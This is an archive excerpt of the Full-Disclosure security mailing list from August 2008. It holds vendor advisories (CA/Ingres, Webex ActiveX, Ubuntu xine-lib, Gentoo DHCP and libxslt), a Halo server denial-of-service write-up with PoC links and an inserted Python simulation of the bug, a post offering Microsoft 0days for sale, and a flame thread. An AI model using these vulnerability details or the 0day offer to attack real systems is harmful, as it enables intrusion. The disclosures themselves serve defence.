RO01277 (ARCserve only)

CA Security Response Blog posting:
CA Products That Embed Ingres Multiple Vulnerabilities
community.ca.com/blogs/casecurityresponseblog/archive/2008/08/06.aspx

Reported By: iDefense Labs
Ingres Database for Linux verifydb Insecure File Permissions Modification Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731
Ingres Database for Linux libbecompat Stack Based Buffer Overflow Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732
Ingres Database for Linux ingvalidpw Untrusted Library Path Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733

Ingres Security Vulnerability Announcement as of August 01, 2008
http://www.ingres.com/support/security-alert-080108.php

CVE References:
CVE-2008-3356 - Ingres verifydb file create permission override.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3356
CVE-2008-3357 - Ingres un-secure directory privileges with utility ingvalidpw.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3357
CVE-2008-3389 - Ingres verifydb, iimerge, csreport buffer overflow.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3389

OSVDB References: Pending
http://osvdb.org/

Changelog for this advisory:
v1.0 - Initial Release

Customers who require additional information should contact CA Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your findings to our product security response team.
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research
CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA. All rights reserved.

From elazar at hushmail.com Wed Aug 6 18:20:02 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Wed, 06 Aug 2008 13:20:02 -0400
Subject: [Full-disclosure] Webex atucfobj Module ActiveX Control Buffer Overflow Vulnerability
Message-ID: <20080806172004.233D711803C@mailserver5.hushmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Who:
Webex
http://www.webex.com/

What:
Webex Meeting Manager
http://support.webex.com/support/downloads.html

How:
The Webex Meeting Manager utilizes several ActiveX controls, one of which is vulnerable to a stack based buffer overflow. The atucfobj Module contains a single method called NewObject() whose only parameter is vulnerable to this issue. This issue has been confirmed in version 20.2008.2601.4928; prior versions are believed to be vulnerable as well.

atucfobj.dll version 20.2008.2601.4928
{32E26FD9-F435-4A20-A561-35D4B987CFDC}

Fix:
The vendor has released version 20.2008.2606.4919 of this control, which fixes this issue. The control should be updated when the user joins a meeting.

Workaround:
Set the killbit for the affected control. See http://support.microsoft.com/kb/240797

Credit:
When I reported this issue to the vendor, they had stated that they were aware of it, but would not say whether it was the result of an internal audit or an independent researcher.
Timeline:
06/20/2008 -> Issue reported to the vendor
06/21/2008 <- Vendor responds asking for further details
06/22/2008 -> Details sent with PoC
06/25/2008 <- Vendor responds stating that they are aware of this issue
08/06/2008 - Disclosure

Elazar

From trejrco at gmail.com Wed Aug 6 20:43:39 2008
From: trejrco at gmail.com (TJ)
Date: Wed, 6 Aug 2008 15:43:39 -0400
Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
In-Reply-To: <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com>
References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com>
Message-ID: <008001c8f7fc$ba7afa20$2f70ee60$@com>

Note that the costs being discussed were purely financial, and you rushed
headlong into adding human lives. That is, to be polite (if blunt) - wrong.

The "cost" conversation is actually how real decisions are made, in the
real world.
/TJ

>-----Original Message-----
>From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of n3td3v
>Sent: Tuesday, August 05, 2008 3:36 PM
>To: full-disclosure at lists.grok.org.uk
>Subject: Re: [Full-disclosure] Media backlash begins against HD Moore and I)ruid
>
>On Tue, Aug 5, 2008 at 7:57 PM, wrote:
>> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said:
>>
>>> Are you suggesting HD Moore had prior knowledge that the Austin Texas
>>> AT&T servers were vulnerable?
>>
>> No - simply saying that either they were vulnerable, or they weren't.
>> If they weren't vulnerable, HD didn't have to do anything. And even
>> if they *were*, somebody would still have to actually *attack* them.
>>
>> And even if they *got* attacked, it's quite possible that the upsides
>> of not bothering to do something outweighed the risks. If you
>> estimate that the cost (including "things you could have spent your
>> time doing") is more than the losses, why bother? "Even if we *got*
>> whacked, we'd lose maybe $500. But in the time I'd waste dealing with
>> the issue, I could generate something that will get us $2,000 in
>> revenue. So if I fix it, I lose $1500, and if I ignore it, I come out
>> $1,500 ahead if we get hit, and $2,000 if we don't".
>>
>
>Is what you're describing not against the law Valdis, it sure sounds like it
>to me. Some kind of gross negligence...
>
>http://legal-dictionary.thefreedictionary.com/Gross+negligence
>http://legal-dictionary.thefreedictionary.com/negligence
>
>Is this what goes on at Virginia Tech on a regular basis? Maybe the
>authorities should be looking into you a lot more while they are looking
>into HD Moore. ;)
>
>I wonder if the intelligence services thought like you before 9/11 and
>7/7 eh...I get the feeling they did.
>
>For sure people like you who support this kind of activity should be
>investigated. It sounds criminal.
>
>Have you ever carried out this kind of activity Valdis where you put security and people at risk to make and/or save money?
>
>If cyber-terrorism is going to become a real threat, we don't need people like Valdis around and we should sure keep track of him.
>
>Would you allow a cyber-9-11 to happen Valdis if there was money involved? I'm starting to become worried about you dude, maybe I should be e-mailing the folks at Virginia Tech this thread, and perhaps, just perhaps the F.B.I and see what they think about what you've just told me.
>
>You seem to be normalizing what you've just described to me as normal run-of-the-mill legal activity, when it clearly isn't.
>
>To me what you've just described is illegal, criminal and wrong.
>
>All the best,
>
>n3td3v

From jamie at canonical.com Wed Aug 6 20:37:14 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Wed, 6 Aug 2008 15:37:14 -0400
Subject: [Full-disclosure] [USN-635-1] xine-lib vulnerabilities
Message-ID: <20080806193714.GA29829@severus.strandboge.com>

===========================================================
Ubuntu Security Notice USN-635-1             August 06, 2008
xine-lib vulnerabilities
CVE-2008-0073, CVE-2008-0225, CVE-2008-0238, CVE-2008-0486,
CVE-2008-1110, CVE-2008-1161, CVE-2008-1482, CVE-2008-1686,
CVE-2008-1878
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.04
Ubuntu 7.10
Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 6.06 LTS:
  libxine-main1                   1.1.1+ubuntu2-7.9

Ubuntu 7.04:
  libxine-main1                   1.1.4-2ubuntu3.1

Ubuntu 7.10:
  libxine1                        1.1.7-1ubuntu1.3

Ubuntu 8.04 LTS:
  libxine1                        1.1.11.1-1ubuntu3.1

After a standard system upgrade you need to restart applications linked against xine-lib to effect the necessary changes.

Details follow:

Alin Rad Pop discovered an array index vulnerability in the SDP parser. If a user or automated system were tricked into opening a malicious RTSP stream, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0073)

Luigi Auriemma discovered that xine-lib did not properly check buffer sizes in the RTSP header-handling code. If xine-lib opened an RTSP stream with crafted SDP attributes, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0225, CVE-2008-0238)

Damian Frizza and Alfredo Ortega discovered that xine-lib did not properly validate FLAC tags. If a user or automated system were tricked into opening a crafted FLAC file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-0486)

It was discovered that the ASF demuxer in xine-lib did not properly check the length of the ASF header. If a user or automated system were tricked into opening a crafted ASF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1110)

It was discovered that the Matroska demuxer in xine-lib did not properly verify frame sizes. If xine-lib opened a crafted ASF file, a remote attacker could cause a denial of service or possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1161)

Luigi Auriemma discovered multiple integer overflows in xine-lib.
If a user or automated system were tricked into opening a crafted FLV, MOV, RM, MVE, MKV or CAK file, a remote attacker may be able to execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-1482)

It was discovered that xine-lib did not properly validate its input when processing Speex file headers. If a user or automated system were tricked into opening a specially crafted Speex file, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program. (CVE-2008-1686)

Guido Landi discovered a stack-based buffer overflow in xine-lib when processing NSF files. If xine-lib opened a specially crafted NSF file with a long NSF title, an attacker could create a denial of service or possibly execute arbitrary code as the user invoking the program. (CVE-2008-1878)

Updated packages for Ubuntu 6.06 LTS, 7.04, 7.10 and 8.04 LTS are available from security.ubuntu.com and ports.ubuntu.com (package URL and MD5 list omitted).
From jeffrey.starck at gmail.com Wed Aug 6 21:08:13 2008
From: jeffrey.starck at gmail.com (Jeffrey Starck)
Date: Wed, 6 Aug 2008 22:08:13 +0200
Subject: [Full-disclosure] offering 0day

Hi,

I am offering Microsoft 0days: Windows, Office and also some applications & services.

Please contact me by email if interested.

Jeffrey
From keytoaster at gentoo.org Wed Aug 6 21:16:35 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Wed, 06 Aug 2008 22:16:35 +0200
Subject: [Full-disclosure] [ GLSA 200808-05 ] ISC DHCP: Denial of Service
Message-ID: <489A06A3.4050703@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200808-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: ISC DHCP: Denial of Service
      Date: August 06, 2008
      Bugs: #227135
        ID: 200808-05

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A Denial of Service vulnerability was discovered in ISC DHCP.

Background
==========

ISC DHCP is ISC's reference implementation of all aspects of the Dynamic Host Configuration Protocol.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-misc/dhcp             < 3.1.1                          >= 3.1.1

Description
===========

A buffer overflow error was found in ISC DHCP server, that can only be exploited under unusual server configurations where the DHCP server is configured to provide clients with a large set of DHCP options.

Impact
======

A remote attacker could exploit this vulnerability to cause a Denial of Service.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All ISC DHCP users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-misc/dhcp-3.1.1"

References
==========

  [ 1 ] CVE-2007-0062
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-05.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
From keytoaster at gentoo.org Wed Aug 6 21:18:44 2008
From: keytoaster at gentoo.org (Tobias Heinlein)
Date: Wed, 06 Aug 2008 22:18:44 +0200
Subject: [Full-disclosure] [ GLSA 200808-06 ] libxslt: Execution of arbitrary code
Message-ID: <489A0724.4080308@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200808-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libxslt: Execution of arbitrary code
      Date: August 06, 2008
      Bugs: #232172
        ID: 200808-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

libxslt is affected by a heap-based buffer overflow, possibly leading to the execution of arbitrary code.

Background
==========

libxslt is the XSLT C library developed for the GNOME project. XSLT is an XML language to define transformations for XML.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  dev-libs/libxslt        < 1.1.24-r1                    >= 1.1.24-r1
                                                                 < 1.1.8

Description
===========

Chris Evans (Google Security) reported that the libexslt library that is part of libxslt is affected by a heap-based buffer overflow in the RC4 encryption/decryption functions.

Impact
======

A remote attacker could entice a user to process an XML file using a specially crafted XSLT stylesheet in an application linked against libxslt, possibly leading to the execution of arbitrary code with the privileges of the user running the application.
Workaround
==========

There is no known workaround at this time.

Resolution
==========

All libxslt users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-libs/libxslt-1.1.24-r1"

References
==========

  [ 1 ] CVE-2008-2935
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2935

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200808-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From bambenek.infosec at gmail.com Wed Aug 6 22:56:24 2008
From: bambenek.infosec at gmail.com (John C. A. Bambenek, GCIH, CISSP)
Date: Wed, 6 Aug 2008 16:56:24 -0500
Subject: [Full-disclosure] [funsec] facebook messages worm

What's the infection vector? URL link? Rogue Facebook app?

On Wed, Aug 6, 2008 at 4:44 PM, Gadi Evron wrote:
> Hi all.
>
> There's a facebook (possibly worm) something malicious sending fake messages from real users (friends).
>
> The sample also has a remote drop site (verified by someone who shall remain nameless).
>
> This is possibly zlob, not verified. Thanks Nick Bilogorskiy for his help.
>
> Infection sites seen so far are on .pl domains.
>
> The AV industry will soon add detection.
> Facebook's security folks are very capable, so I am not worried on that front.
>
> It's not that we didn't expect this for a long time now, but...
> Be careful. Some users know to be careful in email.. but not on facebook.
>
> Note: unlike 2003 when we called everything a worm and the 90s when everything was a virus--this is a bot which also spreads/infects on facebook.
>
> Gadi.
>
> --
> "You don't need your firewalls! Gadi is Israel's firewall."
> -- Itzik (Isaac) Cohen, "Computers czar", Senior Deputy to the Accountant General, Israel's Ministry of Finance, at the government's CIO conference, 2005.
>
> (after two very funny self-deprecation quotes, time to even things up!)
>
> My profile and resume:
> http://www.linkedin.com/in/gadievron
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/6e0cee28/attachment.html

From aluigi at autistici.org Thu Aug 7 00:00:31 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Thu, 7 Aug 2008 00:00:31 +0100
Subject: [Full-disclosure] Endless loop and resources consumption in Halo 1.0.7.0615
Message-ID: <20080807000031.d7c7a135.aluigi@autistici.org>

#######################################################################

Luigi Auriemma

Application:  Halo: Combat Evolved
              http://www.microsoft.com/games/pc/halo.aspx
Versions:     <= 1.0.7.0615 (before 30 Jul 2008)
Platforms:    Windows
Bugs:         A] endless loop
              B] resources consumption
Exploitation: remote, versus server
Date:         06 Aug 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

Halo is the great FPS game developed by Bungie Studios and ported to PC by Gearbox Software (http://www.gearboxsoftware.com). Although it was released at the end of 2003, it is still one of the most played games, with hundreds of internet servers.

#######################################################################

=======
2) Bugs
=======

---------------
A] endless loop
---------------

The Halo server is affected by a problem in the handling of one type of packet which allows bypassing a check used to avoid reading data outside the packet. The result is an endless loop which freezes the application with the CPU at 100%.
------------------------
B] resources consumption
------------------------

When a client occupies a player's slot after joining the match, the Halo server continues to send packets to it forever, because it stops only if an ICMP "destination unreachable" or a disconnection packet is received (there is no timeout, and this is the cause of the problem). I have tested this personally: after a week I was still receiving these packets, because many servers have firewalls which block ICMP, so there is no way to stop this problem except restarting the server. If the player has not occupied the slot yet (so before the handshake performed by the GameSpy SDK), the server sends packets for only 60 seconds.

So if an attacker has blocked outgoing ICMP packets, which is the default on any Windows system with the firewall enabled, he can consume part of the server's network bandwidth and, above all, its memory, with a possible crash or hang of the application as the consequence. Note that, as already said, a handshake is required to occupy the slot, so the packets cannot be spoofed; spoofing is instead possible with the second, 60-second method.

#######################################################################

===========
3) The Code
===========

A] http://aluigi.org/poc/haloloop3.zip
B] http://aluigi.org/poc/halonso.zip

#######################################################################

======
4) Fix
======

The hotfix released on 30 July 2008 solves these problems. Note that this hotfix has the same version number as the previous one, released a month earlier for the haloloop2 bug: 1.0.7.0615.
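As an added illustration of bug B (this is editor-written model code, not Luigi's proof-of-concept and not the Halo server code, whose internals are not public), the Python block below models a UDP game server's slot table. A slot that is freed only by a disconnect packet or an ICMP unreachable never goes away when the client's host firewall silently drops everything, so the server keeps sending (and keeps the per-client state) for as long as it runs; an idle timer bounds the damage while a player who keeps talking is unaffected. The 60-second pre-handshake limit is taken from the advisory; the post-handshake IDLE_TIMEOUT value, the one-update-per-second tick, the packet kinds and the client address are assumptions made for the model.

```python
"""Added example: UDP game-server slot table modelling Halo bug B above.

Not the Halo/Gearbox code and not Luigi's PoC. The pre-handshake 60 s limit
comes from the advisory; IDLE_TIMEOUT, the one-update-per-second tick, the
packet kinds and the addresses are assumptions made for the model.
"""
from dataclasses import dataclass

PRE_HANDSHAKE_LIMIT = 60.0  # seconds a half-open (pre-handshake) slot lives, per the advisory
IDLE_TIMEOUT = 60.0         # seconds of silence after which a fixed server frees an occupied slot (assumed)


@dataclass
class Slot:
    created: float
    last_seen: float
    handshake_done: bool
    updates_sent: int = 0


class GameServer:
    """reap_idle=False reproduces the advisory: once the handshake is done the
    slot is freed only by a disconnect packet or an ICMP unreachable, never by
    silence. reap_idle=True is the fixed behaviour."""

    def __init__(self, reap_idle: bool):
        self.reap_idle = reap_idle
        self.slots: dict[tuple, Slot] = {}
        self.wire: list[tuple] = []  # every update sent; stands in for bandwidth and buffered memory

    def on_packet(self, addr: tuple, kind: str, now: float) -> None:
        if kind == "connect":                      # first packet, handshake not finished
            self.slots[addr] = Slot(now, now, handshake_done=False)
        elif kind == "join":                       # GameSpy-style handshake completed, slot occupied
            slot = self.slots.setdefault(addr, Slot(now, now, handshake_done=False))
            slot.handshake_done = True
            slot.last_seen = now
        elif kind in ("disconnect", "icmp_unreachable"):
            self.slots.pop(addr, None)             # the only two exits in the vulnerable server
        elif addr in self.slots:                   # any other traffic refreshes liveness
            self.slots[addr].last_seen = now

    def tick(self, now: float) -> None:
        """Once per second: reap dead slots, then send a state update to each live one."""
        for addr, slot in list(self.slots.items()):
            if not slot.handshake_done and now - slot.created > PRE_HANDSHAKE_LIMIT:
                del self.slots[addr]               # this limit existed in the vulnerable server too
                continue
            if self.reap_idle and now - slot.last_seen > IDLE_TIMEOUT:
                del self.slots[addr]               # the fix: silence ends the session
                continue
            slot.updates_sent += 1
            self.wire.append((now, addr))


def simulate(reap_idle: bool, complete_handshake: bool, keepalive_every: int = 0,
             seconds: int = 3600) -> tuple[int, bool]:
    """Run one client against the server for `seconds` and return
    (packets the server sent, whether the client's slot is still occupied).

    keepalive_every=0 models the attacker: after the join it sends nothing, and
    its host firewall drops the server's packets without emitting ICMP
    unreachable, so the server never learns that it is gone. A positive value
    models a real player who keeps sending input."""
    srv = GameServer(reap_idle)
    client = ("203.0.113.7", 2302)  # constructed address in TEST-NET-3
    srv.on_packet(client, "connect", 0.0)
    if complete_handshake:
        srv.on_packet(client, "join", 0.0)
    for t in range(1, seconds + 1):
        if keepalive_every and t % keepalive_every == 0:
            srv.on_packet(client, "input", float(t))
        srv.tick(float(t))
    return len(srv.wire), client in srv.slots


if __name__ == "__main__":
    for reap_idle in (False, True):
        sent, occupied = simulate(reap_idle, complete_handshake=True)
        print(f"reap_idle={reap_idle}: {sent} packets sent in an hour, slot still occupied: {occupied}")
```

With reap_idle=False the occupied slot receives one update per second for the whole simulated hour and is still occupied at the end, which is the state Luigi reports seeing after a week; with reap_idle=True the server stops after 60 seconds of silence, exactly as it already did for a client that never finished the handshake, while a client sending input every 10 seconds keeps its slot for the full hour.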
####################################################################### --- Luigi Auriemma http://aluigi.org http://backup.aluigi.org http://mirror.aluigi.org From pschmehl_lists at tx.rr.com Wed Aug 6 23:13:52 2008 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Wed, 06 Aug 2008 17:13:52 -0500 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <008001c8f7fc$ba7afa20$2f70ee60$@com> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> <008001c8f7fc$ba7afa20$2f70ee60$@com> Message-ID: Insanity == doing the same thing repeatedly and expecting a different result. If this is true, then Insane == responding to n3td3v. So how many on this list meet the definition of insane? --On Wednesday, August 06, 2008 15:43:39 -0400 TJ wrote: > Note that the costs being discussed were purely financial, and you rushed > headlong into adding human lives. > That is, to be polite (if blunt) - wrong. > > The "cost" conversation is actually how real decisions are made, in the real > world. > > > > /TJ > > >> -----Original Message----- >> From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >> bounces at lists.grok.org.uk] On Behalf Of n3td3v >> Sent: Tuesday, August 05, 2008 3:36 PM >> To: full-disclosure at lists.grok.org.uk >> Subject: Re: [Full-disclosure] Media backlash begins against HD Moore and >> I)ruid >> >> On Tue, Aug 5, 2008 at 7:57 PM, wrote: >>> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: >>> >>>> Are you suggesting HD Moore had prior knowledge that the Austin Texas >>>> AT&T servers were vulnerable? 
>>> >>> No - simply saying that either they were vulnerable, or they weren't. >>> If they weren't vulnerable, HD didn't have to do anything. And even >>> if they *were*, somebody would still have to actually *attack* them. >>> >>> And even if they *got* attacked, it's quite possible that the upsides >>> of not bothering to do something outweighed the risks. If you >>> estimate that the cost (including "things you could have spent your >>> time doing") is more than the losses, why bother? "Even if we *got* >>> whacked, we'd lose maybe $500. But in the time I'd waste dealing with >>> the issue, I could generate something that will get us $2,000 in >>> revenue. So if I fix it, I lose $1500, and if I ignore it, I come out >> $1,500 ahead if we get hit, and $2,000 if we don't". >>> >> >> Is what you're describing not against the law Valdis, it sure sounds like > it >> to me. Some kind of gross negligence... >> >> http://legal-dictionary.thefreedictionary.com/Gross+negligence >> http://legal-dictionary.thefreedictionary.com/negligence >> >> Is this what goes on at Virginia Tech on a regular basis? Maybe the >> authorities should be looking into you a lot more while they are looking >> into HD Moore. ;) >> >> I wonder if the intelligence services thought like you before 9/11 and >> 7/7 eh...I get the feeling they did. >> >> For sure people like you who support this kind of activity should be >> investigated. It sounds criminal. >> >> Have you ever carried out this kind of activity Valdis where you put >> security and people at risk to make and/or save money? >> >> If cyber-terrorism is going to become a real threat, we don't need people >> like Valdis around and we should sure keep track of him. >> >> Would you allow a cyber-9-11 to happen Valdis if there was money involved?
>> I'm starting to become worried about you dude, maybe I should be e-mailing >> the folks at Virginia Tech this thread, and perhaps, just perhaps the F.B.I >> and see what they think about what you've just told me. >> >> You seem to be normalizing what you've just described to me as normal run-of-the-mill legal activity, when it clearly isn't. >> >> To me what you've just described is illegal, criminal and wrong. >> >> All the best, >> >> n3td3v >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. ******************************************* Check the headers before clicking on Reply. From trejrco at gmail.com Wed Aug 6 23:56:09 2008 From: trejrco at gmail.com (TJ) Date: Wed, 6 Aug 2008 18:56:09 -0400 Subject: [Full-disclosure] Media backlash ... insane? In-Reply-To: References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> <4b6ee9310808051236m50baad19sc9fc4bda17e81646@mail.gmail.com> <008001c8f7fc$ba7afa20$2f70ee60$@com> Message-ID: <00e201c8f817$9f0a5590$dd1f00b0$@com> I'd take offense, except for that annoying ring of truth ... Anyway, I like to think of it more as trying to add value to an ongoing conversation (vs anything insane).
/TJ >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >bounces at lists.grok.org.uk] On Behalf Of Paul Schmehl >Sent: Wednesday, August 06, 2008 6:14 PM >To: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] Media backlash begins against HD Moore and >I)ruid > >Insanity == doing the same thing repeatedly and expecting a different >result. > >If this is true, then > >Insane == responding to n3td3v. > >So how many on this list meet the definition of insane? > >--On Wednesday, August 06, 2008 15:43:39 -0400 TJ wrote: > >> Note that the costs being discussed were purely financial, and you >> rushed headlong into adding human lives. >> That is, to be polite (if blunt) - wrong. >> >> The "cost" conversation is actually how real decisions are made, in >> the real world. >> >> >> >> /TJ >> >> >>> -----Original Message----- >>> From: full-disclosure-bounces at lists.grok.org.uk >>> [mailto:full-disclosure- bounces at lists.grok.org.uk] On Behalf Of >>> n3td3v >>> Sent: Tuesday, August 05, 2008 3:36 PM >>> To: full-disclosure at lists.grok.org.uk >>> Subject: Re: [Full-disclosure] Media backlash begins against HD Moore >>> and I)ruid >>> >>> On Tue, Aug 5, 2008 at 7:57 PM, wrote: >>>> On Tue, 05 Aug 2008 18:40:32 BST, n3td3v said: >>>> >>>>> Are you suggesting HD Moore had prior knowledge that the Austin >>>>> Texas AT&T servers were vulnerable? >>>> >>>> No - simply saying that either they were vulnerable, or they weren't. >>>> If they weren't vulnerable, HD didn't have to do anything. And even >>>> if they *were*, somebody would still have to actually *attack* them. >>>> >>>> And even if they *got* attacked, it's quite possible that the >>>> upsides of not bothering to do something outweighed the risks. If >>>> you estimate that the cost (including "things you could have spent >>>> your time doing") is more than the losses, why bother? "Even if we >>>> *got* whacked, we'd lose maybe $500. 
But in the time I'd waste >>>> dealing with the issue, I could generate something that will get us >>>> $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore >>>> it, I come out >>> $1,500 ahead if we get hit, and $2,000 if we don't". >>>> >>> >>> Is what you're describing not against the law Valdis, it sure sounds >>> like >> it >>> to me. Some kind of gross negligence... >>> >>> http://legal-dictionary.thefreedictionary.com/Gross+negligence >>> http://legal-dictionary.thefreedictionary.com/negligence >>> >>> Is this what goes on at Virginia Tech on a regular basis? Maybe the >>> authorities should be looking into you a lot more while they are >>> looking into HD Moore. ;) >>> >>> I wonder if the intelligence services thought like you before >>> 9/11 and >>> 7/7 eh...I get the feeling they did. >>> >>> For sure people like you who support this kind of activity should be >>> investigated. It sounds criminal. >>> >>> Have you ever carried out this kind of activity Valdis where you put >>> security and people at risk to make and/or save money? >>> >>> If cyber-terrorism is going to become a real threat, we don't need >>> people like Valdis around and we should sure keep track of him. >>> >>> Would you allow a cyber-9-11 to happen Valdis if there was money >involved? >>> I'm starting to become worried about you dude, maybe I should be >>> e-mailing the folks at Virginia Tech this thread, and perhaps, just >>> perhaps the F.B.I and see what they think about what you've just told me. >>> >>> You seem to be normalizing what you've just described to me as normal >>> run-of-the-mill legal activity, when it clearly isn't. >>> >>> To me what you've just described is illegal, criminal and wrong. >>> >>> All the best, >>> >>> n3td3v >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it.
